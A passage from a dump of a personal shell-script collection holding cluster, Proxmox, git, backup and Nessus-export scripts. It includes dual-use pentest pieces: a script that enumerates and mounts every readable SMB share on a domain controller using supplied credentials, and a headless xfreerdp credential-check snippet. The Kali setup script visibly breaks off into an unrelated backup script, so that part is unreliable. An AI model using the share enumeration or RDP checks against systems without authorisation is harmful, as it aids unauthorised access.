200 | RUNNING_ON_NODE="-" 201 | RESOURCE_STATUS="${_RED_}STOPPED${_RESET_}" 202 | fi 203 | 204 | if [[ $RUNNING_ON_NODE == $HOSTNAME ]] ; then 205 | RUNNING_ON_NODE="${RUNNING_ON_NODE}<" 206 | fi 207 | 208 | printf "%-20s%-23s%-20s%-17s\n" $RESOURCE_NAME $RESOURCE_STATUS $RUNNING_ON_NODE $RESOURCE_TYPE 209 | done 210 | else 211 | echo "${_RED_}[ERROR] Resource group \"$RESOURCE_GROUP\" does not exist.${_RESET_}" 212 | fi 213 | else 214 | echo 215 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 216 | echo "${_CYAN_}$CLUSTER_NAME - RESOURCE GROUPS STATUS${_RESET_}" 217 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 218 | 219 | printf "%-20s%-12s%-20s%-10s\n" 'RESOURCE GROUP' STATUS 'RUNNING ON NODE' OTHER 220 | 221 | while read -r GROUP_LIST_ROW ; do 222 | GROUP=$(echo $GROUP_LIST_ROW | cut -d ':' -f 1) 223 | 224 | RESOURCE_COUNT=0 225 | RESOURCE_STARTED_COUNT=0 226 | RESOURCE_STOPPED_COUNT=0 227 | RESOURCE_UNMANAGED_COUNT=0 228 | GROUP_STATUS="" 229 | UNMANAGED_STATUS="" 230 | 231 | for RESOURCE in $(echo $GROUP_LIST_ROW | cut -d ':' -f 2-) ; do 232 | if [[ "$(pcs status resources | grep $RESOURCE | grep -c Started)" -eq 1 ]] ; then 233 | (( RESOURCE_STARTED_COUNT++ )) 234 | elif [[ "$(pcs status resources | grep $RESOURCE | grep -c Stopped)" -eq 1 ]] ; then 235 | (( RESOURCE_STOPPED_COUNT++ )) 236 | fi 237 | 238 | if [[ "$(pcs status resources | grep $RESOURCE | grep -c '(unmanaged)')" -eq 1 ]] ; then 239 | (( RESOURCE_UNMANAGED_COUNT++ )) 240 | fi 241 | 242 | (( RESOURCE_COUNT++ )) 243 | done 244 | 245 | if [[ $RESOURCE_STARTED_COUNT -eq $RESOURCE_COUNT ]] ; then 246 | GROUP_STATUS="${_GREEN_}STARTED${_RESET_}" 247 | elif [[ $RESOURCE_STOPPED_COUNT -eq $RESOURCE_COUNT ]] ; then 248 | GROUP_STATUS="${_RED_}STOPPED${_RESET_}" 249 | else 250 | GROUP_STATUS="${_YELLOW_}PARTIAL${_RESET_}" 251 | fi 252 | 253 | if [[ $RESOURCE_UNMANAGED_COUNT -eq $RESOURCE_COUNT ]] ; then 254 | UNMANAGED_STATUS="${_MAGENTA_}unmanaged${_RESET_}" 255 | elif [[ $RESOURCE_UNMANAGED_COUNT -gt 0 ]] && [[ $RESOURCE_UNMANAGED_COUNT -lt $RESOURCE_COUNT ]] ; then 256 | UNMANAGED_STATUS="${_MAGENTA_}partially_unmanaged${_RESET_}" 257 | fi 258 | 259 | RUNNING_ON_NODE=$((crm_resource --resource $GROUP --locate | head -1 | cut -s -d ':' -f 2) 2> /dev/null) 260 | RUNNING_ON_NODE=$(echo $RUNNING_ON_NODE | tr -d ' ') 261 | 262 | if [[ $RUNNING_ON_NODE == $HOSTNAME ]] ; then 263 | RUNNING_ON_NODE=">${RUNNING_ON_NODE}" 264 | else 265 | RUNNING_ON_NODE=" ${RUNNING_ON_NODE}" 266 | fi 267 | 268 | printf "%-20s%-23s%-20s%-17s\n" $GROUP $GROUP_STATUS "${RUNNING_ON_NODE}" $UNMANAGED_STATUS 269 | done < <(pcs resource group list | sort) 270 | fi 271 | 272 | echo 273 | 274 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/prompt.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # This script shows the RHEL 7 cluster name in the shell prompt. 4 | # Needs to be saved as: /etc/profile.d/prompt.sh 5 | 6 | CLUSTER_NAME=$(pcs config 2> /dev/null | grep 'Cluster Name:' | awk '{print $3}') 7 | 8 | if [[ -z $CLUSTER_NAME ]] ; then 9 | test "$SHELL" == "/bin/bash" && PS1='[\u@\h \w]\$ ' 10 | else 11 | test "$SHELL" == "/bin/bash" && PS1='[$CLUSTER_NAME \u@\h \w]\$ ' 12 | fi 13 | 14 | -------------------------------------------------------------------------------- /System_Administration/Virtualization/proxmox_import_ova.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # Modified by: Giuseppe Patania (pataniag@gmail.com) 5 | # 6 | # Name: proxmox_import_ova.sh 7 | # 8 | # Description: A script that helps importing an Open Virtual Appliance (OVA) 9 | # into ProxMox. A new VM gets created. 10 | # 11 | # Usage: ./proxmox_import_ova.sh --storages 12 | # ./proxmox_import_ova.sh 13 | # 14 | # 15 | # --TODO-- 16 | # - improve and optimize code 17 | # - better checks for command line parameters 18 | # 19 | # 20 | ################################################################################ 21 | 22 | 23 | # VARIABLES -------------------------------------------------------------------- 24 | 25 | STORAGE="VM_STORAGE" 26 | 27 | 28 | # FUNCTIONS -------------------------------------------------------------------- 29 | 30 | command_exists() { 31 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 32 | } 33 | 34 | usage() { 35 | echo "./proxmox_import_ova.sh --storages" 36 | echo "./proxmox_import_ova.sh " 37 | } 38 | 39 | 40 | # CHECKS ----------------------------------------------------------------------- 41 | 42 | declare -a CMDS=( 43 | "awk" 44 | "mktemp" 45 | "pvesh" 46 | "qm" 47 | "tail" 48 | ); 49 | 50 | for CMD in ${CMDS[@]} ; do 51 | command_exists $CMD 52 | done 53 | 54 | 55 | # MAIN ------------------------------------------------------------------------- 56 | 57 | if [[ "$#" -eq 0 ]] ; then 58 | usage 59 | 60 | exit 1 61 | elif [[ "$#" -eq 1 && "$1" == "--storages" ]] ; then 62 | echo "Available storages in ProxMox cluster:" 63 | 64 | pvesh get /storage --noborder --noheader 65 | elif [[ "$#" -eq 2 ]] ; then 66 | OVA=$1 67 | STORAGE=$2 68 | 69 | if [[ ! -f "$OVA" ]] ; then 70 | echo "Error! OVA file not found: $OVA" 71 | echo 72 | 73 | exit 1 74 | fi 75 | 76 | TFILE1=$(mktemp) 77 | TFILE2=$(mktemp) 78 | 79 | pvesh get /nodes --noborder --noheader | awk '{ print $1 }' > $TFILE1 80 | 81 | for NODE in $(cat $TFILE1) ; do 82 | pvesh get /nodes/$NODE/qemu --noborder --noheader | awk '{ print $2 }' >> $TFILE2 83 | done 84 | 85 | LATEST_VMID=$(sort -h $TFILE2 | tail -1) 86 | NEW_VMID=$((LATEST_VMID+1)) 87 | 88 | echo "OVA file: $OVA" 89 | echo "Storage: $STORAGE" 90 | echo "Latest VMID: $LATEST_VMID" 91 | echo "New VMID: $NEW_VMID" 92 | echo "----" 93 | echo "Uncompressing OVA file..." 94 | 95 | tar xvf $OVA > $TFILE1 96 | 97 | echo "Importing OVF file..." 98 | 99 | OVF=$(echo $OVA | sed -e 's/.ova/.ovf/g') 100 | qm importovf $NEW_VMID "$OVF" "$STORAGE" 101 | 102 | echo "Deleting old files..." 103 | 104 | while read LINE ; do 105 | rm -f $LINE 106 | done < $TFILE1 107 | 108 | rm -f $TFILE1 $TFILE2 109 | 110 | exit 0 111 | else 112 | usage 113 | 114 | exit 1 115 | fi 116 | -------------------------------------------------------------------------------- /System_Administration/fix_locales.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | locale-gen en_US.UTF-8 4 | 5 | export LANGUAGE=en_US.UTF-8 6 | export LANG=en_US.UTF-8 7 | export LC_ALL=en_US.UTF-8 8 | 9 | locale-gen en_US.UTF-8 10 | 11 | dpkg-reconfigure locales 12 | -------------------------------------------------------------------------------- /System_Administration/mount_smb_shares_with_auth.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: mount_smb_shares_with_auth.sh 6 | # 7 | # Description: Given valid credentials, this script lists and mounts all the 8 | # readable(/writable) shares from a given SMB server. 9 | # 10 | # Usage: ./mount_smb_shares_with_auth.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | USERNAME='testuser' 23 | PASSWORD='Passw0rd!' 24 | DOMAIN='TEST' 25 | HOSTNAME='dc.test.local' 26 | MOUNTDIR=/tmp/CIFS 27 | 28 | 29 | # FUNCTIONS -------------------------------------------------------------------- 30 | 31 | command_exists() { 32 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 33 | } 34 | 35 | 36 | # CHECKS ----------------------------------------------------------------------- 37 | 38 | declare -a CMDS=( 39 | "mount.cifs" 40 | "smbmap" 41 | ); 42 | 43 | for CMD in ${CMDS[@]} ; do 44 | command_exists $CMD 45 | done 46 | 47 | 48 | # MAIN ------------------------------------------------------------------------- 49 | 50 | echo "Username: $USERNAME" 51 | echo "Domain: $DOMAIN" 52 | echo "Host: $HOSTNAME" 53 | echo 54 | echo "Shares found on \"$HOSTNAME\":" 55 | 56 | #enum4linux -u $USERNAME -p $PASSWORD -w $DOMAIN -S $HOSTNAME | grep ^'//' | grep -vF '[E]' 57 | 58 | for SHARE in $(smbmap -u $USERNAME -p $PASSWORD -d $DOMAIN -H $HOSTNAME | grep 'READ' | awk '{ print $1 }') ; do 59 | echo "//$HOSTNAME/$SHARE" 60 | 61 | S=$MOUNTDIR/$SHARE 62 | 63 | umount -q $S 64 | mkdir -p $S 65 | 66 | mount.cifs -o ro,user=$USERNAME,password=$PASSWORD,domain=$DOMAIN "//$HOSTNAME/$SHARE" $S 67 | done 68 | 69 | echo 70 | echo "Mounted shares can be found in:" 71 | echo $MOUNTDIR 72 | echo 73 | -------------------------------------------------------------------------------- /System_Administration/pip_upgrade_pkgs.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | for PKG in $(pip freeze | cut -d'=' -f1) ; do 4 | pip install $PKG 5 | done 6 | 7 | for PKG in $(pip3 freeze | cut -d'=' -f1) ; do 8 | pip3 install $PKG 9 | done 10 | 11 | -------------------------------------------------------------------------------- /System_Administration/prepare_kali.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: prepare_kali.sh 6 | # 7 | # Description: A script that installs and configures useful packages on a 8 | # minimal Kali Linux installation. 9 | # 10 | # Usage: ./prepare_kali.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | OPENVAS_USER='user' 23 | OPENVAS_PASS='password' 24 | 25 | 26 | # MAIN ------------------------------------------------------------------------- 27 | 28 | cat > /etc/apt/sources.list.d/custom.list </dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 34 | } 35 | 36 | 37 | # CHECKS ----------------------------------------------------------------------- 38 | 39 | declare -a CMDS=( 40 | "ccrypt" 41 | ); 42 | 43 | for CMD in ${CMDS[@]} ; do 44 | command_exists $CMD 45 | done 46 | 47 | 48 | # MAIN ------------------------------------------------------------------------- 49 | 50 | apt list --installed | grep -vF 'Listing...' | cut -d'/' -f1 > /etc/INSTALLED_PACKAGES 51 | 52 | echo "Directories to backup:" 53 | echo "${DIRS_TO_BACKUP[@]}" | tr ' ' '\n' 54 | echo 55 | echo "Output file:" 56 | echo $OUT_FILE 57 | echo 58 | 59 | tar -czf - $(echo ${DIRS_TO_BACKUP[*]}) 2> /dev/null | ccrypt > $OUT_FILE 60 | 61 | -------------------------------------------------------------------------------- /System_Administration/snippets.txt: -------------------------------------------------------------------------------- 1 | # execute a locally defined function on a remote host via SSH 2 | function foo() 3 | { 4 | date 5 | uptime 6 | hostname 7 | } 8 | typeset -f | ssh user@remotehost "$(cat); foo" 9 | 10 | 11 | 12 | # find the longest line in a text file 13 | egrep -n "^.{$(wc -L < file.txt)}$" file.txt | sed 's/:/ -> /' 14 | 15 | 16 | 17 | # find all the strings with length equal or smaller than a given value in a text file 18 | awk 'length($1) <= 12 { print $1 }' file.txt 19 | 20 | 21 | 22 | # find the 10 largest directories starting from / 23 | du -hsx -- /* | sort -rh | head -10 24 | 25 | 26 | 27 | # [WINDOWS] realign Domain Controllers after ZeroLogon exploitation 28 | - Stop/Disable Kerberos Distribution Center 29 | - Reboot the server 30 | - Run the following command: 31 | netdom resetpwd /server:dc01.example.net /userd:example.net\administrator /passwordd:******** 32 | - Reboot the server 33 | - Enable KDC and start the service 34 | 35 | 36 | 37 | # test RDP login with XFreeRDP without using a graphical environment (dummy X is necessary) 38 | Xvfb :1 & 39 | export DISPLAY=:1 40 | xfreerdp /log-level:OFF --ignore-certificate --authonly -u $USERNAME -p $PASSWORD $HOST 41 | if [[ $? -eq 0 ]] ; then 42 | echo -n "$HOST: OK" 43 | fi 44 | -------------------------------------------------------------------------------- /Utilities/free_buffer_cache.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | echo '==== BEFORE ====' 4 | free 5 | sync 6 | echo 3 > /proc/sys/vm/drop_caches 7 | echo '==== AFTER ====' 8 | free 9 | 10 | -------------------------------------------------------------------------------- /Utilities/git_list_repos.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: git_list_repos.sh 6 | # 7 | # Description: Given a directory that contains a lot of nested directories with 8 | # many GIT projects, this script lists all the projects' 9 | # directories with their relative GIT project's remote URL. 10 | # 11 | # Usage: ./git_list_repos.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | GIT_BASE_DIR=/usr/local/src/GIT 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "git" 37 | ); 38 | 39 | for CMD in ${CMDS[@]} ; do 40 | command_exists $CMD 41 | done 42 | 43 | 44 | # MAIN ------------------------------------------------------------------------- 45 | 46 | CUR_DIR=$(pwd) 47 | 48 | for DIR in $(find $GIT_BASE_DIR -name ".git" | sed -e 's/\/.git//g' | sort) ; do 49 | cd $DIR 50 | 51 | URL=$(git remote -v | grep fetch | awk '{print $2}') 52 | 53 | echo "DIR: ${DIR}" 54 | echo "URL: ${URL}" 55 | 56 | echo 57 | done 58 | 59 | cd $CUR_DIR 60 | 61 | -------------------------------------------------------------------------------- /Utilities/git_update_repos.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: git_update_repos.sh 6 | # 7 | # Description: Given a directory that contains a lot nested directories with 8 | # many GIT projects, this script updates all the GIT projects code 9 | # to the latest version. 10 | # 11 | # Usage: ./git_update_repos.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | GIT_BASE_DIR=/usr/local/src/GIT 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "git" 37 | ); 38 | 39 | for CMD in ${CMDS[@]} ; do 40 | command_exists $CMD 41 | done 42 | 43 | 44 | # MAIN ------------------------------------------------------------------------- 45 | 46 | CUR_DIR=$(pwd) 47 | 48 | for DIR in $(find $GIT_BASE_DIR -name ".git" | sed -e 's/\/.git//g' | sort) ; do 49 | cd $DIR 50 | 51 | PROJ=$(git remote -v | head -n1 | awk '{print $2}' | sed -e 's,.*:\(.*/\)\?,,' -e 's/\.git$//') 52 | 53 | echo "---- $PROJ" 54 | 55 | git pull 56 | 57 | echo 58 | done 59 | 60 | cd $CUR_DIR 61 | 62 | -------------------------------------------------------------------------------- /Utilities/greenpass_qr_decoder.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Convert a EU Digital COVID Certificate ("Green Pass") QR CODE to text and show its contents. 4 | # 5 | # TOOD: 6 | # - convert binary encoded strings 7 | # 8 | # https://git.gir.st/greenpass.git/blob_plain/master:/greenpass.py 9 | 10 | QRCODE=$1 11 | 12 | if [ "$#" -ne 1 ]; then 13 | echo "Usage: ./gp_qr_decoder.sh " 14 | exit 1 15 | fi 16 | 17 | if [[ ! -f ${QRCODE} ]] ; then 18 | echo "Image file \"${QRCODE}\" not found." 19 | exit 1 20 | fi 21 | 22 | #sudo pip3 install base45 cbor2 23 | cd /tmp || exit 1 24 | zbarimg "${QRCODE}" > /tmp/pass.txt 25 | sed -e 's/QR-Code:HC1://' < /tmp/pass.txt > /tmp/pass2.txt 26 | base45 --decode < /tmp/pass2.txt > /tmp/pass2.zz 27 | zlib-flate -uncompress < /tmp/pass2.zz > /tmp/pass2.bin 28 | python3 -m cbor2.tool --pretty < /tmp/pass2.bin > /tmp/pass2.dec 29 | cat /tmp/pass2.dec 30 | 31 | rm -f /tmp/pass.txt /tmp/pass2.txt /tmp/pass2.zz /tmp/pass2.bin /tmp/pass2.dec 32 | -------------------------------------------------------------------------------- /Utilities/magnet2torrent.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: magnet2torrent.sh 6 | # 7 | # Description: A script that gets a Magnet link as input and returns a valid 8 | # .torrent file as output. You must be able to connect to the 9 | # BitTorrent network to use this tool. 10 | # 11 | # Usage: ./magnet2torrent.sh '' 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | MAGNET=$1 24 | OUTDIR=$2 25 | 26 | 27 | # FUNCTIONS -------------------------------------------------------------------- 28 | 29 | command_exists() { 30 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 31 | } 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | declare -a CMDS=( 37 | "aria2c" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | if [[ "$#" -ne 2 ]] ; then 45 | echo "Usage: ./magnet2torrent.sh '' " 46 | 47 | exit 1 48 | fi 49 | 50 | 51 | # MAIN ------------------------------------------------------------------------- 52 | 53 | if [[ -d ${OUTDIR} ]] ; then 54 | mkdir -p ${OUTDIR} 55 | fi 56 | 57 | aria2c -d ${OUTDIR} --bt-metadata-only=true --bt-save-metadata=true --listen-port=6881 "${MAGNET}" 58 | 59 | -------------------------------------------------------------------------------- /Utilities/mysql2csv.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: mysql2csv.sh 6 | # 7 | # Description: A script that reads all the "INSERT" queries from a MySQL dump 8 | # file and saves the records in a CSV file ("dump_sql.csv"). 9 | # The result may be a bit messy but is easy to grep and parse. 10 | # 11 | # Usage: ./mysql2csv.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | SQL=$1 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "dos2unix" 37 | "gawk" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | if [[ "$#" -ne 1 ]] ; then 45 | echo "Usage: ./mysql2csv.sh " 46 | 47 | exit 1 48 | fi 49 | 50 | 51 | # MAIN ------------------------------------------------------------------------- 52 | 53 | cat $SQL | dos2unix | gawk ' 54 | BEGIN { 55 | table = "dump_sql"; 56 | sql = 1 57 | } 58 | 59 | { 60 | if ($0 ~ "^INSERT INTO ") { 61 | sql = 0 62 | } 63 | else if ($0 ~ "^DROP TABLE IF EXISTS") { 64 | table = gensub(/DROP TABLE IF EXISTS `(.+)`;/, "\\1", "g" $0); 65 | sql = 1 66 | } 67 | else { 68 | sql = 1 69 | } 70 | 71 | if (sql == 1) { 72 | print > table".sql"; 73 | } 74 | else { 75 | n = split($0, a, /(^INSERT INTO `[^`]*` VALUES \()|(\),\()|(\);$)/) 76 | 77 | for(i=1;i<=n;i++) { 78 | len = length(a[i]) 79 | if (len > 0) { 80 | data = a[i] 81 | print data > table".csv"; 82 | } 83 | } 84 | } 85 | } 86 | 87 | END {} 88 | ' 89 | 90 | -------------------------------------------------------------------------------- /Utilities/nessus_massive_export.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nessus_massive_export.sh 6 | # 7 | # Description: When working with Nessus vulnerability scanner, if you have a 8 | # lot of scans in a folder, it takes a boringly long time to 9 | # download all the exports by hand. 10 | # This scripts lets you download the exports of all the scans in 11 | # a folder in just one shot. 12 | # 13 | # Usage: ./nessus_massive_export.sh [FOLDER_ID] 14 | # 15 | # Notes: Tested on Nessus Professional 8.5.1. 16 | # It may not work with older versions. 17 | # 18 | # 19 | # --TODO-- 20 | # - make it work with older versions 21 | # - do checks when there are no folders or no scans in a folder 22 | # - do checks on potential server timeouts and longer time to sleep 23 | # 24 | # 25 | ################################################################################ 26 | 27 | 28 | # VARIABLES -------------------------------------------------------------------- 29 | 30 | HOSTADDR="192.168.1.34" # the IP address of your Nessus scanner 31 | HOSTPORT="8834" # the TCP port of your Nessus scanner (default: 8834) 32 | USERNAME="nessus_user" 33 | PASSWORD='nessus_password' 34 | 35 | TMPDIR="/tmp/.nme" # directory that will contain temporary files 36 | REPORTSDIR="${TMPDIR}/reports" # directory that will contain XML ".nessus" files exported from Nessus 37 | SLEEPSEC=10 # seconds to wait to let Nessus generate the export file 38 | UA="cURL/7.65.3" # custom user agent 39 | 40 | 41 | # FUNCTIONS -------------------------------------------------------------------- 42 | 43 | command_exists() { 44 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 45 | } 46 | 47 | 48 | # CHECKS ----------------------------------------------------------------------- 49 | 50 | declare -a CMDS=( 51 | "bc" 52 | "column" 53 | "curl" 54 | "gunzip" 55 | "gzip" 56 | "nc" # "OpenBSD rewrite of netcat" is required (pkg: netcat-openbsd) 57 | "jq" 58 | "jsonlint" # (pkg: python3-demjson) 59 | "wc" 60 | ); 61 | 62 | for CMD in ${CMDS[@]} ; do 63 | command_exists $CMD 64 | done 65 | 66 | 67 | # MAIN ------------------------------------------------------------------------- 68 | 69 | [[ $DEBUG -ne 0 ]] && set -x 70 | 71 | if [[ "$#" -ge 2 ]] ; then 72 | echo "./nessus_massive_export.sh [FOLDER_ID]" 73 | echo 74 | 75 | exit 1 76 | fi 77 | 78 | cat /dev/null | nc -w 3 -n -N ${HOSTADDR} ${HOSTPORT} &> /dev/null 79 | 80 | if [[ $? -ne 0 ]] ; then 81 | echo "TCP port ${HOSTPORT} at host ${HOSTADDR} seems to be closed. Quitting..." 82 | echo 83 | 84 | exit 1 85 | fi 86 | 87 | L1=$(echo -n "${USERNAME}" | wc -m) 88 | L2=$(echo -n "${PASSWORD}" | wc -m) 89 | CL=$(echo "$L1+$L2+29" | bc) 90 | 91 | AUTH=$(curl -s -k -X $"POST" \ 92 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"Content-Length: $CL" -H $"Connection: close" \ 93 | --data-binary $"{\"username\":\"${USERNAME}\",\"password\":\"${PASSWORD}\"}" \ 94 | $"https://${HOSTADDR}:${HOSTPORT}/session" | jsonlint -f | grep token | awk '{ print $4 }' | tr -d '"') 95 | 96 | if [[ -z "$AUTH" ]] ; then 97 | echo "Authentication error for user \"${USERNAME}\"! Quitting..." 98 | echo 99 | 100 | exit 1 101 | fi 102 | 103 | mkdir -p $TMPDIR 104 | 105 | curl -s -k -X $"GET" \ 106 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $'Referer: https://10.70.80.10:${HOSTPORT}/' -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Connection: close" \ 107 | $"https://${HOSTADDR}:${HOSTPORT}/server/properties" -o $TMPDIR/properties.gz 108 | 109 | gzip -t $TMPDIR/properties.gz 2> /dev/null 110 | 111 | if [[ $? -eq 0 ]] ; then 112 | gunzip -q --synchronous $TMPDIR/properties.gz 113 | else 114 | mv $TMPDIR/properties.gz $TMPDIR/properties 115 | fi 116 | 117 | VERSION=$(cat $TMPDIR/properties | jq -M '.nessus_type, .server_version' | tr -d '\n' | sed -e 's/""/ /g' | tr -d '"') 118 | MAJOR_VERSION=$(echo $VERSION | cut -d'.' -f1) 119 | 120 | rm -f $TMPDIR/properties 121 | 122 | echo "Scanner version: ${VERSION}" 123 | echo " Scanner URL: https://${HOSTADDR}:${HOSTPORT}/" 124 | echo " AUTH token: ${AUTH}" 125 | 126 | if [[ "$#" -eq 0 ]] ; then 127 | curl -s -k -X $"GET" \ 128 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $'Referer: https://10.70.80.10:${HOSTPORT}/' -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Connection: close" \ 129 | $"https://${HOSTADDR}:${HOSTPORT}/folders" -o $TMPDIR/folders.gz 130 | 131 | gzip -t $TMPDIR/folders.gz 2> /dev/null 132 | 133 | if [[ $? -eq 0 ]] ; then 134 | gunzip -q --synchronous $TMPDIR/folders.gz 135 | else 136 | mv $TMPDIR/folders.gz $TMPDIR/folders 137 | fi 138 | 139 | echo 140 | 141 | cat $TMPDIR/folders | jq -M -S -c '.folders[] | {name, id}' | jq -M -s 'sort_by(.name)' | grep -Ev '\[|\]|{|}' | cut -d':' -f2 | sed -z 's/,\n//g' | column 142 | rm -f $TMPDIR/folders 143 | 144 | echo 145 | elif [[ "$#" -eq 1 ]] ; then 146 | FOLDERID=$1 147 | 148 | curl -s -k -X $"GET" \ 149 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Connection: close" \ 150 | $"https://${HOSTADDR}:${HOSTPORT}/scans?folder_id=${FOLDERID}" -o $TMPDIR/scans.gz 151 | 152 | gzip -t $TMPDIR/scans.gz 2> /dev/null 153 | 154 | if [[ $? -eq 0 ]] ; then 155 | gunzip -q --synchronous $TMPDIR/scans.gz 156 | else 157 | mv $TMPDIR/scans.gz $TMPDIR/scans 158 | fi 159 | 160 | rm -rf ${REPORTSDIR} 161 | mkdir -p ${REPORTSDIR} 162 | 163 | echo " Folder ID: ${FOLDERID}" 164 | echo " Temp files dir: ${TMPDIR}" 165 | echo " Reports dir: ${REPORTSDIR}" 166 | echo " Sleep time: ${SLEEPSEC} seconds" 167 | echo 168 | 169 | for SCANID in $(cat $TMPDIR/scans | jq -M ".scans" | grep -F '"id":' | awk '{ print $NF }' | tr -d ',' | sort -h) ; do 170 | ### TODO: test for old versions 171 | #curl -s -k -X $"POST" \ 172 | #-H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Content-Length: 19" -H $"Connection: close" \ 173 | #--data-binary $'{\"format\":\"nessus\"}' \ 174 | #$"https://${HOSTADDR}:${HOSTPORT}/scans/${SCANID}/export" -o $TMPDIR/$SCANID.json 175 | 176 | curl -s -k -X $"POST" \ 177 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Content-Length: 19" -H $"Connection: close" \ 178 | --data-binary $'{\"format\":\"nessus\"}' \ 